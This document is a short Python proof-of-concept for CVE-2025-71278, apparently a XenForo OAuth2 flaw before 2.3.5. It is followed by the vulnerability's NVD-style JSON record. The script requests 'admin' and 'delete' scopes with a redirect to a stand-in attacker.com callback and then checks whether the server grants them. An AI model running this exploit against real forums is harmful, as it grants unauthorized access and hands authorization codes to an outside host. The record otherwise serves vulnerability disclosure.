CVE-2025-71278

import requests # Target configuration target_url = "https://example.com/oauth2/authorize" client_id = "vulnerable_client_id" redirect_uri = "https://attacker.com/callback" # The vulnerability allows requesting unauthorized scopes. # Here we attempt to request 'admin' scope which should not be granted. malicious_scope = "read write admin delete" params = { "client_id": client_id, "response_type": "code", "redirect_uri": redirect_uri, "scope": malicious_scope, "state": "random_string_123" } print(f"Sending malicious request to: {target_url}") try: # Send the authorization request response = requests.get(target_url, params=params, allow_redirects=False) # Check if the server accepts the unauthorized scope # A successful exploit often results in a redirect to the callback URL or a 200 OK with the scope approved if response.status_code == 302 and redirect_uri in response.headers.get('Location', ''): print("[+] Potential Vulnerability Detected!") print(f"[+] Redirect Location: {response.headers['Location']}") print("[+] The server may have accepted the unauthorized scope.") else: print("[-] Attack failed or scope was rejected by the server.") print(f"Status Code: {response.status_code}") except Exception as e: print(f"Error occurred: {e}")

{"cve": {"id": "CVE-2025-71278", "sourceIdentifier": "[email protected]", "published": "2026-04-01T01:16:40.000", "lastModified": "2026-04-01T18:51:48.267", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "XenForo before 2.3.5 allows OAuth2 client applications to request unauthorized scopes. This affects any customer using OAuth2 clients on any version of XenForo 2.3 prior to 2.3.5, potentially allowing client applications to gain access beyond their intended authorization level."}, {"lang": "es", "value": "XenForo anterior a 2.3.5 permite a las aplicaciones cliente OAuth2 solicitar ámbitos no autorizados. Esto afecta a cualquier cliente que utilice clientes OAuth2 en cualquier versión de XenForo 2.3 anterior a 2.3.5, lo que podría permitir a las aplicaciones cliente obtener acceso más allá de su nivel de autorización previsto."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:xenforo:xenforo:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.3.0", "versionEndExcluding": "2.3.5", "matchCriteriaId": "38603AFC-2A94-400D-B368-E9856873EF6D"}]}]}], "references": [{"url": "https://www.vulncheck.com/advisories/xenforo-oauth2-unauthorized-scope-request", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://xenforo.com/community/threads/xenforo-2-3-5-includes-security-fix-add-ons-released.228812/", "source": "[email protected]", "tags": ["Release Notes"]}]}}